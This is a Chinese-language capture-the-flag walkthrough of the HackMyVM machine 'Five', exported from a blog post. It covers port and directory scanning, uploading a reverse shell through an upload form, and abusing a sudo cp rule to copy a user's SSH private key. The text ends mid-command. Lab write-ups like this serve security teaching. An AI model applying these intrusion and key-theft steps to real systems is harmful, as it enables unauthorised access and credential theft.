{"id":600,"date":"2024-04-21T18:21:43","date_gmt":"2024-04-21T10:21:43","guid":{"rendered":"http:\/\/162.14.82.114\/?p=600"},"modified":"2024-04-21T18:21:43","modified_gmt":"2024-04-21T10:21:43","slug":"hmv-_-five","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/600\/04\/21\/2024\/","title":{"rendered":"hmv[-_-]Five"},"content":{"rendered":"<h1>Five<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821891.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821891.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421171829132\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821892.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821892.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421172522301\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.0.188 -- -A\n\nOpen 192.168.0.188:80\n\nPORT   STATE SERVICE REASON  VERSION\n80\/tcp open  http    syn-ack nginx 1.14.2\n|_http-title: 403 Forbidden\n|_http-server-header: nginx\/1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD POST\n| http-robots.txt: 1 disallowed entry \n|_\/admin<\/code><\/pre>\n<h3>\u76ee\u5f55\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Five]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.188 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.188\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              jpg,txt,php,zip,bak\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/uploads              (Status: 301) [Size: 185] [--&gt; http:\/\/192.168.0.188\/uploads\/]\n\/admin                (Status: 301) [Size: 185] [--&gt; http:\/\/192.168.0.188\/admin\/]\n\/upload.php           (Status: 200) [Size: 48]\n\/robots.txt           (Status: 200) [Size: 17]\nProgress: 1323360 \/ 1323366 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Five]\n\u2514\u2500$ sudo dirsearch -u http:\/\/192.168.0.188 -e* -i 200,300-399 2&gt;\/dev\/null\n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/Five\/reports\/http_192.168.0.188\/_24-04-21_05-31-59.txt\n\nTarget: http:\/\/192.168.0.188\/\n\n[05:31:59] Starting: \n[05:32:04] 301 -  185B  - \/admin  -&gt;  http:\/\/192.168.0.188\/admin\/\n[05:32:05] 200 -    4KB - \/admin\/\n[05:32:05] 200 -    4KB - \/admin\/index.html\n[05:32:35] 200 -   17B  - \/robots.txt\n[05:32:43] 200 -   48B  - \/upload.php\n[05:32:43] 200 -  346B  - \/upload.html\n[05:32:43] 301 -  185B  - \/uploads  -&gt;  http:\/\/192.168.0.188\/uploads\/<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821893.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821893.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421172819818\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.188\/admin\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821894.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821894.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421172837916\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821895.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821895.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421172851505\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.188\/robots.txt<\/code><\/pre>\n<pre><code class=\"language-text\">Disallow:\/admin<\/code><\/pre>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.188\/upload.php<\/code><\/pre>\n<pre><code class=\"language-text\">Sorry, there was an error uploading your file.<\/code><\/pre>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.188\/upload.html<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821896.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821896.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421173345395\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.188\/uploads\/<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821897.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821897.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421173730112\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u4e0a\u4f20\u53cd\u5f39shell<\/h3>\n<p>\u5c1d\u8bd5\u4e0a\u4f20\u53cd\u5f39shell\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821898.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821898.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421173807702\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u6fc0\u6d3b\u8fd0\u884c\uff01\u4f46\u662f\u6ca1\u6709\u4f20\u56de\u6765\uff0c\u5c1d\u8bd5\u6293\u5305\uff0c\u770b\u770b\u662f\u4e0d\u662f\u6587\u4ef6\u7c7b\u578b\u7684\u9505\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821899.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821899.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421174641256\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4e0a\u4f20\u5230<code>uploads<\/code>\u76ee\u5f55\u7684\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u5230\u6839\u76ee\u5f55\u4e0a\u53bb\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821900.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821900.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421174721855\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8bd5\u8bd5\uff01<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Five]\n\u2514\u2500$ curl http:\/\/192.168.0.188\/reverseShell.php                                                 \n&lt;html&gt;\n&lt;head&gt;&lt;title&gt;404 Not Found&lt;\/title&gt;&lt;\/head&gt;\n&lt;body bgcolor=&quot;white&quot;&gt;\n&lt;center&gt;&lt;h1&gt;404 Not Found&lt;\/h1&gt;&lt;\/center&gt;\n&lt;hr&gt;&lt;center&gt;nginx\/1.14.2&lt;\/center&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;<\/code><\/pre>\n<p>\u4e0d\u884c\uff0c\u76f4\u63a5\u5220\u6389\u8bd5\u8bd5\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821901.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821901.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421174942607\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd8\u662f\u4e0d\u884c\uff0c\u8fd9\u91cc\u6211\u591a\u5220\u6389\u4e86\u4e00\u4e2a\u7a7a\u767d\u884c\u6240\u4ee5\u6ca1\u6709\u8bc6\u522b\u51fa\u6765\uff0c\u4e0d\u8981\u591a\u5220\u5c31\u884c\u4e86\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821902.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821902.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421175124455\" style=\"zoom: 50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821903.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821903.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421175142263\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821905.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821905.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421175150926\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@five:\/$ sudo -l\nMatching Defaults entries for www-data on five:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on five:\n    (melisa) NOPASSWD: \/bin\/cp<\/code><\/pre>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/cp\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/cp\/#sudo<\/a><\/p>\n<p>\u5c1d\u8bd5\u5229\u7528\u4e00\u4e0b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821906.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211821906.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240421175426669\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u6700\u540e\u4e00\u4e2a\u4e0d\u77e5\u9053\u884c\u4e0d\u884c\uff0c\u4f46\u662f\u597d\u50cf\u4e0d\u592a\u9614\u4ee5\uff0c\u5c31\u7b97\u6210\u529f\u4e86\u4e5f\u4f1a\u7834\u574f\u73af\u5883\uff0c\u5148\u4e0d\u8003\u8651\uff0c\u7ee7\u7eed\u641c\u96c6\u4e00\u4e0b\u4fe1\u606f\uff1a<\/p>\n<h3>\u590d\u5236\u79c1\u94a5<\/h3>\n<pre><code class=\"language-bash\">(remote) www-data@five:\/$ cd \/home\n(remote) www-data@five:\/home$ ls -la\ntotal 12\ndrwxr-xr-x  3 root   root   4096 Oct  5  2020 .\ndrwxr-xr-x 18 root   root   4096 Oct  5  2020 ..\ndrwxr-xr-x  4 melisa melisa 4096 Oct  6  2020 melisa\n(remote) www-data@five:\/home$ cd melisa\/\n(remote) www-data@five:\/home\/melisa$ ls -la\ntotal 40\ndrwxr-xr-x 4 melisa melisa 4096 Oct  6  2020 .\ndrwxr-xr-x 3 root   root   4096 Oct  5  2020 ..\n-rw------- 1 melisa melisa  100 Oct  6  2020 .Xauthority\n-rw-r--r-- 1 melisa melisa  220 Oct  5  2020 .bash_logout\n-rw-r--r-- 1 melisa melisa 3526 Oct  5  2020 .bashrc\n-rw------- 1 melisa melisa   72 Oct  5  2020 .lesshst\ndrwxr-xr-x 3 melisa melisa 4096 Oct  5  2020 .local\n-rw-r--r-- 1 melisa melisa  807 Oct  5  2020 .profile\ndrwx------ 2 melisa melisa 4096 Oct  6  2020 .ssh\n-rw------- 1 melisa melisa   14 Oct  5  2020 user.txt\n(remote) www-data@five:\/home\/melisa$ cd .ssh\nbash: cd: .ssh: Permission denied\n(remote) www-data@five:\/home\/melisa$ cd \/tmp\n(remote) www-data@five:\/tmp$ sudo -u melisa cp \/home\/melisa\/.ssh\/id_rsa \/tmp\/id_rsa\n(remote) www-data@five:\/tmp$ chmod 600 id_rsa \nchmod: changing permissions of &#039;id_rsa&#039;: Operation not permitted\n(remote) www-data@five:\/tmp$ ls -la\ntotal 36\ndrwxrwxrwt  8 root   root   4096 Apr 21 05:56 .\ndrwxr-xr-x 18 root   root   4096 Oct  5  2020 ..\ndrwxrwxrwt  2 root   root   4096 Apr 21 05:17 .ICE-unix\ndrwxrwxrwt  2 root   root   4096 Apr 21 05:17 .Test-unix\ndrwxrwxrwt  2 root   root   4096 Apr 21 05:17 .X11-unix\ndrwxrwxrwt  2 root   root   4096 Apr 21 05:17 .XIM-unix\ndrwxrwxrwt  2 root   root   4096 Apr 21 05:17 .font-unix\n-rw-------  1 melisa melisa 1811 Apr 21 05:56 id_rsa\ndrwx------  3 root   root   4096 Apr 21 05:17 systemd-private-78d8e7134f2f4ec89dc2c5815b640611-systemd-timesyncd.service-dJl3ZN\n(remote) www-data@five:\/tmp$ rm id_rsa \nrm: remove write-protected regular file &#039;id_rsa&#039;? y\nrm: cannot remove &#039;id_rsa&#039;: Operation not permitted\n(remote) www-data@five:\/tmp$ touch melisa\n(remote) www-data@five:\/tmp$ sudo -u melisa cp \/home\/melisa\/.ssh\/id_rsa \/tmp\/melisa\n(remote) www-data@five:\/tmp$ ls -la\ntotal 40\ndrwxrwxrwt  8 root     root     4096 Apr 21 05:57 .\ndrwxr-xr-x 18 root     root     4096 Oct  5  2020 ..\ndrwxrwxrwt  2 root     root     4096 Apr 21 05:17 .ICE-unix\ndrwxrwxrwt  2 root     root     4096 Apr 21 05:17 .Test-unix\ndrwxrwxrwt  2 root     root     4096 Apr 21 05:17 .X11-unix\ndrwxrwxrwt  2 root     root     4096 Apr 21 05:17 .XIM-unix\ndrwxrwxrwt  2 root     root     4096 Apr 21 05:17 .font-unix\n-rw-------  1 melisa   melisa   1811 Apr 21 05:56 id_rsa\n-rw-rw-rw-  1 www-data www-data 1811 Apr 21 05:57 melisa\ndrwx------  3 root     root     4096 Apr 21 05:17 systemd-private-78d8e7134f2f4ec89dc2c5815b640611-systemd-timesyncd.service-dJl3ZN\n(remote) www-data@five:\/tmp$ chmod 600 melisa\n(remote) www-data@five:\/tmp$ nc 127.0.0.1 22\n(UNKNOWN) [127.0.0.1] 22 (ssh) : Connection refused<\/code><\/pre>\n<p>\u4e0d\u53ef\u4ee5\u76f4\u63a5\u8fdb\u884c\u590d\u5236\uff0c\u56e0\u4e3a\u6267\u884c\u8005\u8fd8\u662f<code>melisa<\/code>\uff0c\u6211\u4eec\u8981\u521b\u5efa\u4e00\u4e2a\u6211\u4eec\u81ea\u5df1\u7684\u6587\u4ef6\u5145\u5f53\u5bb9\u5668\uff0c\u7136\u540e\u628a\u76ee\u6807\u653e\u8fdb\u53bb\u624d\u884c\uff01<\/p>\n<h3>\u67e5\u770b\u7aef\u53e3<\/h3>\n<p>\u7136\u540e\u5c31\u662f\u53d1\u73b0\u6ca1\u5f00\u653e<code>22<\/code>\u7aef\u53e3\uff0c\u67e5\u770b\u4e00\u4e0b\u662f\u5426\u5f00\u542f\u4e86ssh\u670d\u52a1\uff01<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@five:\/tmp$ ss -tnlup\nNetid       State        Recv-Q       Send-Q             Local Address:Port               Peer Address:Port                                             \nudp         UNCONN       0            0                        0.0.0.0:68                      0.0.0.0:*                                                \ntcp         LISTEN       0            128                      0.0.0.0:80                      0.0.0.0:*           users:((&quot;nginx&quot;,pid=416,fd=6))       \ntcp         LISTEN       0            128                    127.0.0.1:4444                    0.0.0.0:*                                                \ntcp         LISTEN       0            128                         [::]:80                         [::]:*           users:((&quot;nginx&quot;,pid=416,fd=7))<\/code><\/pre>\n<p>\u53d1\u73b0\u5f00\u653e\u4e86<code>4444<\/code>\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8fde\u63a5\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@five:\/tmp$ ssh melisa@127.0.0.1 -p 4444 -i melisa \nCould not create directory &#039;\/var\/www\/.ssh&#039;.\nThe authenticity of host &#039;[127.0.0.1]:4444 ([127.0.0.1]:4444)&#039; can&#039;t be established.\nECDSA key fingerprint is SHA256:jWQpYhXQJtOuJfrNjZvNSilLDT7fkbFxeioQzGTBY7Y.\nAre you sure you want to continue connecting (yes\/no)? yes\nFailed to add the host to the list of known hosts (\/var\/www\/.ssh\/known_hosts).\nmelisa@127.0.0.1&#039;s password: <\/code><\/pre>\n<h3>\u751f\u6210\u9ed8\u8ba4\u516c\u94a5<\/h3>\n<p>\u8bf4\u660e\u786e\u5b9e\u5f00\u653e\u4e86\u76f8\u5173\u7aef\u53e3\uff0c\u4f46\u662f\u6ca1\u6709<code>authorized_keys<\/code>\uff0c\u751f\u6210\u4e00\u4e2acp\u8fdb\u53bb\uff01<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@five:\/tmp$ ssh-keygen -y -f melisa &gt; 